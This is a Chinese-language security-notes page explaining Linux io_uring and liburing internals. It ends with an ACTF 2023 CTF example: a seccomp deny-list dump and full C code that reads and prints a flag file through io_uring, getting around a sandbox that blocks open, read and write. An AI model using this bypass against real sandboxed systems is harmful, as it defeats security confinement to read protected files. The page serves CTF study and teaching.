> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/io_uring.md).

# io\_uring

[Linux.io\_uring-Top-down-Approach | V3rdant's Blog](https://v3rdant.cn/Linux.io_uring-Top-down-Approach/)

## what's io\_uring

```c
425	common	io_uring_setup		sys_io_uring_setup
426	common	io_uring_enter		sys_io_uring_enter
427	common	io_uring_register	sys_io_uring_register
```

`io_uring` 是 `Linux 5.1` 引入的一个**高性能异步 I/O 接口**，形式灵活通用，可以将多个 `I/O` 请求发给内核处理，批量接收结果，减少用户态和内核态转换的开销

### 组成

1. `SQ`
2. `CQ`
3. `SQEs`
4. `CQEs`

### 调用

`io_uring_setup` 创造一个 `io_uring` 实例，返回一个 `fd` ，利用这个 `fd` 操作 `mmap` 出 `SQ/CQ`

`io_uring_enter` 提交 `SQ` 里的请求

`io_uring_register` 注册资源，内核可以长期引用这些资源，减少反复准备成本，降低开销

### 流程

```c
/* Create the ring; QUEUE_DEPTH is the requested SQ size, flags = 0. */
struct io_uring ring={0};
io_uring_queue_init(QUEUE_DEPTH, &ring, 0);

/* Get a submission queue entry (SQE) to describe one request. */
struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);

/* Fill the SQE as a read request using fd, buf, len and offset. */
io_uring_prep_read(sqe, fd, buf, len, offset);
/* Caller-chosen tag; presumably reported back in the matching CQE -- confirm in the io_uring docs. */
sqe->user_data = 123;

/* Submit the prepared request(s) to the kernel. */
io_uring_submit(&ring);

/* Wait for a completion queue entry (CQE). */
struct io_uring_cqe *cqe;
io_uring_wait_cqe(&ring, &cqe);

/* cqe->res carries the result of the request. */
if (cqe->res < 0) {
    // error: -cqe->res
} else {
    // success: cqe->res bytes read
}

/* Mark the CQE as consumed, then tear down the ring. */
io_uring_cqe_seen(&ring, cqe);
io_uring_queue_exit(&ring);
```

### 相关接口

#### liburing

**结构体**

其结构体可见

[liburing/src/include/liburing.h at master · axboe/liburing](https://github.com/axboe/liburing/blob/master/src/include/liburing.h)

```c
/* User-space bookkeeping for one io_uring instance (filled in by io_uring_queue_init). */
struct io_uring {
	/* Submission queue state. */
	struct io_uring_sq sq;
	/* Completion queue state. */
	struct io_uring_cq cq;
	/* Copy of io_uring_params.flags recorded at init time. */
	unsigned flags;
	/* Ring fd, or -1 when IORING_SETUP_REGISTERED_FD_ONLY was used. */
	int ring_fd;

	/* Copy of io_uring_params.features recorded at init time. */
	unsigned features;
	/* Value returned by __sys_io_uring_setup. */
	int enter_ring_fd;
	/* liburing-internal INT_FLAG_* bits. */
	__u8 int_flags;
	__u8 pad[3];
	unsigned pad2;
};
```

其关键的成员为 `io_uring_sq` 和 `io_uring_cq`

```c
/* User-space view of the submission queue (SQ). */
struct io_uring_sq {
	/* NOTE(review): the k* pointers presumably point into the ring memory shared with the kernel -- confirm. */
	unsigned *khead;
	unsigned *ktail;
	// Deprecated: use `ring_mask` instead of `*kring_mask`
	unsigned *kring_mask;
	// Deprecated: use `ring_entries` instead of `*kring_entries`
	unsigned *kring_entries;
	unsigned *kflags;
	unsigned *kdropped;
	/* SQ index array; initialised to array[i] = i unless IORING_SETUP_NO_SQARRAY is set. */
	unsigned *array;
	/* The request (SQE) array, located in shared memory. */
	struct io_uring_sqe *sqes;

	unsigned sqe_head;
	unsigned sqe_tail;

	/* Size of the ring mapping; the NO_MMAP setup path may set this to 0. */
	size_t ring_sz;
	/* Base of the mmap'ed (or user-provided) ring memory. */
	void *ring_ptr;

	unsigned ring_mask;
	/* Number of SQ slots. */
	unsigned ring_entries;

	/* Size passed to munmap for `sqes` on the setup error path. */
	unsigned sqes_sz;
	unsigned pad;
};
```

其关键的成员为 `sqes`，指向请求队列（在共享内存里）

还有 `ring_ptr`，指向 `mmap` 出来的共享内存，其中存放内核处理 `io_uring` 时使用的环形队列信息

```c
/* User-space view of the completion queue (CQ). */
struct io_uring_cq {
	/* NOTE(review): the k* pointers presumably point into the ring memory shared with the kernel -- confirm. */
	unsigned *khead;
	unsigned *ktail;
	// Deprecated: use `ring_mask` instead of `*kring_mask`
	unsigned *kring_mask;
	// Deprecated: use `ring_entries` instead of `*kring_entries`
	unsigned *kring_entries;
	unsigned *kflags;
	unsigned *koverflow;
	/* The completion entry (CQE) array. */
	struct io_uring_cqe *cqes;

	/* Size of the CQ ring mapping; set to 0 on the NO_MMAP setup path. */
	size_t ring_sz;
	/* Base of the CQ ring memory; may be the same mapping as sq.ring_ptr. */
	void *ring_ptr;

	unsigned ring_mask;
	unsigned ring_entries;

	unsigned pad[2];
};
```

![image-20260603201628647](/files/SV1FBIGlmK16ghKqIxYK)

![image-20260603201835035](/files/o2G84jbcwGJ32QHkgS18)

**io\_uring\_queue\_init**

`io_uring_queue_init` 通过 `io_uring_setup` 完成内核工作，并使用 `mmap` 将部分内核空间映射到用户态内存，通过共享内存方便用户态访问

```c
int io_uring_queue_init(unsigned entries, struct io_uring *ring,
			unsigned flags) LIBURING_NOEXCEPT;
->
int io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
				struct io_uring_params *p) LIBURING_NOEXCEPT;
->
static int io_uring_queue_init_try_nosqarr(unsigned entries, struct io_uring *ring,
					   struct io_uring_params *p, void *buf,
					   size_t buf_size)
->
int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
				 struct io_uring_params *p, void *buf,
				 size_t buf_size)
```

参数如下：

* `entries`：`sq` 队列大小
* `ring`：用户态管理 `io_uring` 的结构体
* `flags`

其函数可在[liburing/src/setup.c at master · axboe/liburing](https://github.com/axboe/liburing/blob/master/src/setup.c)查看

```c
/*
 * Initialise `ring` for a new io_uring instance with `entries` SQ slots.
 *
 * Steps, in order: zero `ring`; reject REGISTERED_FD_ONLY without NO_MMAP;
 * in NO_MMAP mode pre-allocate ring memory via io_uring_alloc_huge(); call
 * __sys_io_uring_setup(); either mmap the rings (io_uring_queue_mmap) or wire
 * up pointers into the pre-allocated memory (io_uring_setup_ring_pointers);
 * fill the SQ index array; record features/flags/fds in `ring`.
 *
 * p:        setup parameters; p->flags selects the paths above.
 * buf:      optional caller-provided memory, only used in NO_MMAP mode; when
 *           non-NULL the ring is marked INT_FLAG_APP_MEM.
 * buf_size: size of `buf`.
 *
 * Returns `ret` on success (0 on the mmap path; in NO_MMAP mode the
 * non-negative value io_uring_alloc_huge() returned). On failure returns
 * -EINVAL, the negative value from io_uring_alloc_huge() or
 * __sys_io_uring_setup(), or the non-zero value from io_uring_queue_mmap().
 */
int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
				 struct io_uring_params *p, void *buf,
				 size_t buf_size)
{
	int fd, ret = 0;
	unsigned *sq_array;
	unsigned sq_entries, index;

	memset(ring, 0, sizeof(*ring));

	/*
	 * The kernel does this check already, but checking it here allows us
	 * to avoid handling it below.
	 */
	if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY
	    && !(p->flags & IORING_SETUP_NO_MMAP))
		return -EINVAL;

	/* NO_MMAP: ring memory is prepared in user space before the setup call. */
	if (p->flags & IORING_SETUP_NO_MMAP) {
		ret = io_uring_alloc_huge(entries, p, &ring->sq, &ring->cq,
						buf, buf_size);
		if (ret < 0)
			return ret;
		if (buf)
			ring->int_flags |= INT_FLAG_APP_MEM;
	}

	fd = __sys_io_uring_setup(entries, p);
	if (fd < 0) {
		/* Setup failed: undo the NO_MMAP allocation, but only if it is not app-provided memory. */
		if ((p->flags & IORING_SETUP_NO_MMAP) &&
		    !(ring->int_flags & INT_FLAG_APP_MEM)) {
			__sys_munmap(ring->sq.sqes, ring->sq.sqes_sz);
			io_uring_unmap_rings(&ring->sq, &ring->cq);
		}
		return fd;
	}

	if (!(p->flags & IORING_SETUP_NO_MMAP)) {
		ret = io_uring_queue_mmap(fd, p, ring);
		if (ret) {
			__sys_close(fd);
			return ret;
		}
	} else {
		io_uring_setup_ring_pointers(p, &ring->sq, &ring->cq);
	}

	/*
	 * Directly map SQ slots to SQEs
	 */
	sq_entries = ring->sq.ring_entries;

	if (!(p->flags & IORING_SETUP_NO_SQARRAY)) {
		sq_array = ring->sq.array;
		for (index = 0; index < sq_entries; index++)
			sq_array[index] = index;
	}
	ring->features = p->features;
	ring->flags = p->flags;
	ring->enter_ring_fd = fd;
	/* With REGISTERED_FD_ONLY no ring fd is stored (ring_fd = -1); only enter_ring_fd holds the setup result. */
	if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY) {
		ring->ring_fd = -1;
		ring->int_flags |= INT_FLAG_REG_RING | INT_FLAG_REG_REG_RING;
	} else {
		ring->ring_fd = fd;
	}
	/*
	 * IOPOLL always needs to enter, except if SQPOLL is set as well.
	 * Use an internal flag to check for this.
	 */
	if ((ring->flags & (IORING_SETUP_IOPOLL|IORING_SETUP_SQPOLL)) ==
			IORING_SETUP_IOPOLL)
		ring->int_flags |= INT_FLAG_CQ_ENTER;

	return ret;
}
```

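若设置了 `IORING_SETUP_REGISTERED_FD_ONLY` 却没有设置 `IORING_SETUP_NO_MMAP`，函数直接返回 `-EINVAL`。没有设置 `IORING_SETUP_NO_MMAP` 时会直接调用 `__sys_io_uring_setup`，随后通过 `io_uring_queue_mmap` 映射共享内存；设置了 `IORING_SETUP_NO_MMAP` 时则在 `__sys_io_uring_setup` 之后使用 `io_uring_setup_ring_pointers` 设置指针和结构体。最后初始化 `sq.array`，并填充 `ring` 的 `features`、`flags`、`ring_fd` 等字段后返回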

`io_uring_get_sqe` 返回对应的 `sqe`，用户在其中设置需要完成的任务后，使用 `io_uring_submit` 提交请求

**io\_uring\_alloc\_huge**

上面提到，没有设置 `IORING_SETUP_NO_MMAP` 时会直接 `__sys_io_uring_setup`；而只要设置了 `IORING_SETUP_NO_MMAP`（无论是否同时设置 `IORING_SETUP_REGISTERED_FD_ONLY`），就会先调用 `io_uring_alloc_huge`，预先在用户态准备好 `SQ` 和 `CQ` 的内存

先计算所需内存

```c
sqes_mem = sq_entries * sizeof(struct io_uring_sqe);
sqes_mem = (sqes_mem + page_size - 1) & ~(page_size - 1);
ring_mem = cq_entries * sizeof(struct io_uring_cqe);
if (p->flags & IORING_SETUP_CQE32)
	ring_mem *= 2;
if (!(p->flags & IORING_SETUP_NO_SQARRAY))
	ring_mem += sq_entries * sizeof(unsigned);
mem_used = sqes_mem + ring_mem;
mem_used = (mem_used + page_size - 1) & ~(page_size - 1);
```

如果用户传入了 `buf` 并且足够大则设置为用户 `buf`，设置

```c
sq->ring_ptr = (void *)sq->sqes + sqes_mem;
cq->ring_sz = 0;
sq->ring_sz = 0;
```

如果不够大则 `mmap` 出一块内存，设置

```c
sq->ring_ptr = ptr;
sq->ring_sz = buf_size;
cq->ring_sz = 0;
```

然后设置 `__sys_io_uring_setup` 的参数

```c
cq->ring_ptr = (void *) sq->ring_ptr;
p->sq_off.user_addr = (unsigned long) sq->sqes;
p->cq_off.user_addr = (unsigned long) sq->ring_ptr;
```

**io\_uring\_queue\_mmap**

没有设置 `IORING_SETUP_NO_MMAP` 的会进入这个函数，再进入 `io_uring_mmap`，计算 `sq` 和 `cq` 的 `ring` 的 `size`，`__sys_mmap` 出 `sq` 和 `cq` 的 `ring` 的指针（设置了 `IORING_FEAT_SINGLE_MMAP` 则 `cq` 使用 `sq` 通过 `mmap` 出来的同一块内存，否则分别单独 `mmap`）

然后`__sys_mmap` 出 `sq->sqes` 的内存

然后进入 `io_uring_setup_ring_pointers` 设置指针

**请求函数**

所有的请求有

[liburing/src/include/liburing.h at master · axboe/liburing](https://github.com/axboe/liburing/blob/master/src/include/liburing.h)

常见的有

```c
io_uring_prep_openat()
io_uring_prep_close()
io_uring_prep_read()
io_uring_prep_write()
io_uring_prep_readv()
io_uring_prep_writev()
io_uring_prep_fsync()
io_uring_prep_statx()
```

#### kernel

`io_ring_ctx`

`io_uring_params`

`io_uring_sqe/io_uring_cqe`

对应结构体可以自己查看

[ACTF 2023 Writeup - 星盟安全团队](https://blog.xmcve.com/2023/10/31/ACTF-2023-Writeup)

```bash
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x19 0xc000003e  if (A != ARCH_X86_64) goto 0027
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x16 0xffffffff  if (A != 0xffffffff) goto 0027
 0005: 0x15 0x15 0x00 0x00000000  if (A == read) goto 0027
 0006: 0x15 0x14 0x00 0x00000001  if (A == write) goto 0027
 0007: 0x15 0x13 0x00 0x00000002  if (A == open) goto 0027
 0008: 0x15 0x12 0x00 0x00000011  if (A == pread64) goto 0027
 0009: 0x15 0x11 0x00 0x00000012  if (A == pwrite64) goto 0027
 0010: 0x15 0x10 0x00 0x00000013  if (A == readv) goto 0027
 0011: 0x15 0x0f 0x00 0x00000014  if (A == writev) goto 0027
 0012: 0x15 0x0e 0x00 0x00000028  if (A == sendfile) goto 0027
 0013: 0x15 0x0d 0x00 0x0000002c  if (A == sendto) goto 0027
 0014: 0x15 0x0c 0x00 0x0000002e  if (A == sendmsg) goto 0027
 0015: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0027
 0016: 0x15 0x0a 0x00 0x00000101  if (A == openat) goto 0027
 0017: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0027
 0018: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0027
 0019: 0x15 0x07 0x00 0x0000012f  if (A == name_to_handle_at) goto 0027
 0020: 0x15 0x06 0x00 0x00000130  if (A == open_by_handle_at) goto 0027
 0021: 0x15 0x05 0x00 0x00000142  if (A == execveat) goto 0027
 0022: 0x15 0x04 0x00 0x00000147  if (A == preadv2) goto 0027
 0023: 0x15 0x03 0x00 0x00000148  if (A == pwritev2) goto 0027
 0024: 0x15 0x02 0x00 0x000001ac  if (A == 0x1ac) goto 0027
 0025: 0x15 0x01 0x00 0x000001b5  if (A == 0x1b5) goto 0027
 0026: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0027: 0x06 0x00 0x00 0x00000000  return KILL
```

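这个沙箱禁用了 `open/read/write`（`orw`）等系统调用，但没有禁用 `io_uring_setup`（425）、`io_uring_enter`（426）、`io_uring_register`（427），因此即使禁用了 `orw`，仍然可以通过 `io_uring` 让内核代为完成 `orw`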

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <liburing.h>
#include <unistd.h>
#include <syscall.h>
#include <sys/prctl.h>

#define QUEUE_DEPTH 1

/*
 * Submit everything queued on `ring`, wait for one completion, store its
 * result in `*res`, and mark the CQE as seen so the next wait returns the
 * next completion instead of this one again.
 *
 * Returns 0 when a completion was reaped (its own status is in `*res`), or
 * the negative errno from liburing when submit/wait failed. liburing reports
 * errors as -errno return values and does not set errno, so strerror(-ret)
 * is used rather than perror().
 */
static int submit_and_reap(struct io_uring *ring, int *res)
{
    struct io_uring_cqe *cqe;
    int ret;

    ret = io_uring_submit(ring);
    if (ret < 0) {
        fprintf(stderr, "io_uring_submit: %s\n", strerror(-ret));
        return ret;
    }

    ret = io_uring_wait_cqe(ring, &cqe);
    if (ret < 0) {
        fprintf(stderr, "io_uring_wait_cqe: %s\n", strerror(-ret));
        return ret;
    }

    *res = cqe->res;
    io_uring_cqe_seen(ring, cqe);
    return 0;
}

/*
 * Open ./flag, read up to sizeof(buffer) bytes from it and write them to
 * stdout (fd 1), issuing all three operations through io_uring instead of
 * the open/read/write system calls.
 *
 * Returns 0 on success, 1 on any failure. The ring and the opened file are
 * released on every path after the ring has been created.
 */
int main(void) {
    struct io_uring ring = {0};
    struct io_uring_sqe *sqe;
    char buffer[4096] = {0};
    int fd = -1;
    int res = 0;
    int nread;
    int ret;
    int status = 1;

    ret = io_uring_queue_init(QUEUE_DEPTH, &ring, 0);
    if (ret < 0) {
        fprintf(stderr, "io_uring_queue_init: %s\n", strerror(-ret));
        return 1;
    }

    /* Prepare the open request (relative to the current working directory). */
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "Failed to get SQE\n");
        goto out;
    }
    io_uring_prep_openat(sqe, AT_FDCWD, "./flag", O_RDONLY, 0);
    io_uring_sqe_set_data(sqe, NULL);

    if (submit_and_reap(&ring, &res) < 0)
        goto out;
    if (res < 0) {
        fprintf(stderr, "Open error: %d\n", res);
        goto out;
    }
    fd = res;  /* the completion result is the new file descriptor */

    /* Prepare the read request. */
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "Failed to get SQE\n");
        goto out;
    }
    io_uring_prep_read(sqe, fd, buffer, sizeof(buffer), 0);
    io_uring_sqe_set_data(sqe, NULL);

    if (submit_and_reap(&ring, &res) < 0)
        goto out;
    if (res < 0) {
        fprintf(stderr, "Read error: %d\n", res);
        goto out;
    }
    nread = res;  /* number of bytes actually read */

    /*
     * Prepare the write request. Use the byte count from the read rather
     * than strlen(buffer): a file that fills the whole buffer leaves no NUL
     * terminator, and file contents may contain embedded NUL bytes.
     */
    sqe = io_uring_get_sqe(&ring);
    if (!sqe) {
        fprintf(stderr, "Failed to get SQE\n");
        goto out;
    }
    io_uring_prep_write(sqe, 1, buffer, (unsigned)nread, 0);
    io_uring_sqe_set_data(sqe, NULL);

    if (submit_and_reap(&ring, &res) < 0)
        goto out;
    if (res < 0) {
        fprintf(stderr, "Write error: %d\n", res);
        goto out;
    }

    status = 0;

out:
    /* Tear down the ring and close the file on success and failure alike. */
    io_uring_queue_exit(&ring);
    if (fd >= 0)
        close(fd);
    /* NOTE(review): delay kept from the original success path; its purpose is not stated -- confirm it is still needed. */
    if (status == 0)
        sleep(1);

    return status;
}
```
